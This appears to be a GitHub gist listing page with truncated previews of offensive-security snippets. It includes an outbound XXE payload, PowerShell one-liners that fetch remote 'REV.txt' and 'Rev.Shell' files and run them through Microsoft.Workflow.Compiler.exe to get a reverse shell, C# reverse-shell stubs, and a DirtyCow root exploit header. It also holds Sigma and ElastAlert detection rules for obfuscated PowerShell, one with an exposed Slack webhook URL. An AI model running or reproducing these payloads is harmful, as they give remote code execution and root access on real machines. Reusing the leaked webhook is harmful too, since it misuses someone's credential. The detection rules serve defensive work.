This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<package> | |
<component | |
id="dummy"> | |
<registration | |
description="dummy" | |
progid="dummy" | |
version="1.00" | |
remotable="True"> | |
<script |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.IO; | |
using System.Diagnostics; | |
using System.ComponentModel; | |
using System.Linq; | |
using System.Net; | |
using System.Net.Sockets; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
64bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell | |
32bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.IO; | |
using System.Diagnostics; | |
using System.ComponentModel; | |
using System.Net; | |
using System.Net.Sockets; | |
using System.Workflow.Activities; | |
public class Program : SequentialWorkflowActivity |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | |
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<d2p1:string>Rev.Shell</d2p1:string> | |
</files> | |
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | |
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | |
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* A PTRACE_POKEDATA variant of CVE-2016-5195 | |
* should work on RHEL 5 & 6 | |
* | |
* (un)comment correct payload (x86 or x64)! | |
* $ gcc -pthread c0w.c -o c0w | |
* $ ./c0w | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* mmap fa65a000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert: | |
- slack | |
slack_webhook_url: https://hooks.slack.com/services/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 | |
description: Detects suspicious PowerShell invocation with a parameter substring | |
filter: | |
- query: | |
query_string: | |
query: (process_path:"*\\powershell.exe" AND (" \-windowstyle h " OR " \-windowstyl | |
h" OR " \-windowsty h" OR " \-windowst h" OR " \-windows h" OR " \-windo h" | |
OR " \-wind h" OR " \-win h" OR " \-wi h" OR " \-win h " OR " \-win hi " OR |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
title: Suspicious PowerShell Parameter Substring | |
status: experimental | |
description: Detects suspicious PowerShell invocation with a parameter substring | |
references: | |
- http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier | |
tags: | |
- attack.execution | |
- attack.t1086 | |
author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | |
logsource: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry | |
[Flags()] | |
enum RegistryOptions { | |
CloseKey = 0x00000001 | |
QuerySecurityKey = 0x00000002 | |
SetSecurityKey = 0x00000004 | |
EnumerateValueKey = 0x00000010 | |
QueryMultipleValueKey = 0x00000020 | |
SetInformationKey = 0x00000040 | |
FlushKey = 0x00000080 |
OlderNewer